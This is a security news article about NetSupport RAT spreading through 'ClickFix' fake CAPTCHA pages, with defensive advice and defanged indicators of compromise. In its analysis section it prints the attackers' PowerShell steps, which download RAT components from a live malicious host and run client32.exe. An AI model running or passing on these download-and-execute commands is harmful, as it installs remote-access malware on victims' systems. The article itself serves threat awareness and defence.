There has been a noticeable surge in the utilization of the NetSupport Remote Access Trojan (RAT) in recent times, as noted by cybersecurity professionals. This malevolent tool enables attackers to acquire complete control over systems that have been compromised.
The increase in activity has been associated with the “ClickFix” Initial Access Vector (IAV), an advanced form of social engineering that deceives users into executing harmful PowerShell commands.
Originally designed as a legitimate remote IT support tool in 1989, NetSupport RAT has now been repurposed by cybercriminals to oversee screens, manipulate keyboards and mice, transfer files, and perform malicious instructions.
If left undetected, it can result in serious repercussions, such as ransomware incursions, data breaches, and disruptions to business operations.
The ClickFix methodology includes implanting phony CAPTCHA pages on compromised sites, guiding users to copy and execute PowerShell commands.
These commands facilitate the downloading and installation of the NetSupport RAT client, setting up Command-and-Control (C2) connections to gateways controlled by the attacker.
.webp)
According to eSentire analysts, the RAT payloads are frequently hosted on URLs with “.png” in the path, and the C2 gateway URLs often contain “fakeurl.htm.”
.webp)
Examination of the Attack
The PowerShell script applied in ClickFix assaults usually encompasses the subsequent stages:-
- Creation of Random Folders:
$randomFolderName = -join ((65..90) + (97..122) | Get-Random -Count 6 | ForEach-Object {[char]$_})
$randomFolderPath = Join-Path -Path $env:APPDATA -ChildPath $randomFolderName
New-Item -ItemType Directory -Path $randomFolderPath- Retrieval of RAT Components:-
$url = "http://fbinter.com/a/1.png"
$file = $randomFolderPath + "client32.ini"
Invoke-WebRequest $url -OutFile $fileSimilar instructions are utilized for acquiring other elements such as client32.exe and setup files.
- Execution of the RAT:-
$file12 = $randomFolderPath + "client32.exe"
Start-Process $file12.webp)
To safeguard against NetSupport RAT and ClickFix assaults, enterprises should deploy Endpoint Detection and Response (EDR) agents on all corporate resources and provide security awareness training to educate staff about emerging threats like ClickFix.
Additionally, restricting user privileges can aid in preventing unauthorized software installations.
Organizations should also bolster security by deactivating the Run command and limiting WScript.exe and Mshta.exe using Group Policy Objects (GPO) or Windows Defender Application Control (WDAC).
Remaining updated on the latest IOCs and enforcing robust security measures is vital in defending against these complex threats.
Signs of Compromise (SOCs)
- ClickFix Web Pages:
- hxxp[://]eveverify[.]com/captcha[.]html
- hxxps[://]eiesoft.com/Ray-verify[.]html
- Delivery of NetSupport RAT Payload:
- hxxp[://]fbinter[.]com/a/1[.]png
- hxxp[://]fbinter[.]com/a/2[.]png
- hxxp[://]fbinter[.]com/a/3[.]png
The post NetSupport RAT Grant Attackers Full Access To Victims Systems appeared first on Cyber Security News.